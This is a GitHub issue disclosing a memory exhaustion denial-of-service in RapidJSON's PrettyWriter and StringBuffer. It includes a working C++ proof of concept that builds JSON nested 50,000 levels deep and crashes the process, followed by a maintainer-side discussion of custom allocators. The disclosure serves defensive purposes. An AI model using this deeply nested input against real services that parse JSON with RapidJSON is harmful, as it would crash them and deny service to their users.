Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Memory exhaustion denial of service #2283

Open
orihjfrog opened this issue May 30, 2024 · 5 comments
Open

Memory exhaustion denial of service #2283

orihjfrog opened this issue May 30, 2024 · 5 comments

Comments

@orihjfrog
Copy link

orihjfrog commented May 30, 2024

Summary

RapidJSON crashes when parsing a malformed JSON input.

Technical Details

The function Accept in document.h is used to visit values and handle them. One of the available handlers is the PrettyWriter handler. The PrettyWriter handler writes the objects to a stream. One of the available stream types is StringBuffer, which has no limit to the amount of data written into it. Since the PrettyWriter handler writes spaces for arrays and objects, more memory is needed to output a nested array or object than the memory needed for representing them in the first place. A malicious JSON with a very deeply nested array or object can cause a memory exhaustion and crash the software, even if the nested array isn’t too deep for the recursive parser.

Proof of Concept

The following code will crash before printing the string “end”. Note that we used a pretty small recursion (50000), and we used the recursive version of the Parse function, to show that the recursion is small enough to parse, but creates a string too big.

#include <iostream>
#include "rapidjson/document.h"
#include "rapidjson/stringbuffer.h"
#include "rapidjson/prettywriter.h"

using namespace rapidjson;

int main() {
   std::string json = "{\"a\":";
   for (int i = 0; i < 50000; i++) {
       json += "[";
   }
   json += "5";
   for (int i = 0; i < 50000; i++) {
       json += "]";
   }
   json += "}";

   Document d;

   std::cout << "before parsing" << std::endl << std::flush;

   d.Parse(json.c_str());

   Value& s = d["a"];

   std::cout << "before converting back to string" << std::endl << std::flush;

   StringBuffer buffer;
   PrettyWriter<StringBuffer> writer(buffer);
   s.Accept(writer);

   std::cout << "end" << std::endl << std::flush;

   std::flush(std::cout);
   return 0;
}

When running this code we got:

before parsing
before converting back to string
Killed

Fix suggestion

Add an argument to StringBuffer that will allow limiting the size of the string.

Credit

The vulnerability was discovered by Ori Hollander of the JFrog Security Research team.

@srmish-jfrog
Copy link

We could not find an official RapidJSON disclosure email address. We tried to report this issue privately to the package maintainer ([email protected]) but didn't receive a response for more than 6 months. Hopefully someone can see this issue here and address it.

@aikawayataro
Copy link
Contributor

You can define your own allocator with memory cap in this case.

@srmish-jfrog
Copy link

How can this be done? Is it mentioned in the documentation somewhere? (we couldn't find this mentioned as an issue anywhere)

Why not add a default memory cap with a reasonable limit in order to avoid DoS?

@aikawayataro
Copy link
Contributor

How can this be done?

By defining your own allocator type and passing it as a template argument to any dependent type/function.
There was a similar topic discussed here earlier about the "null from malloc" problem.

Why not add a default memory cap with a reasonable limit in order to avoid DoS?

I think for the same reason, you won't find this kind of "safety" in many other tools. Do you have this reasonable limit in your std::vector?
I can't find anywhere that RapidJSON offers memory safety out of the box. This principle applies to countless C/C++ libraries: if you need safety, you either choose safety-ready libraries or implement this mechanism yourself. With RapidJSON it's possible to implement safety, you can define your own allocator types, use filters, streams and SAX.

@aikawayataro
Copy link
Contributor

I think the main reason RapidJSON is considered unsafe is that it does not throw exceptions by design. But you can easily extend it.

The use of this library in new projects should be a matter of careful consideration. While it works and can be hacked for memory safety and exceptions, there has been no new release for 8 years. As far as I can see, only bug fixes are merged. If you need fast json parser there are many libraries with a healthy release model and some of them are even faster than RapidJSON.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants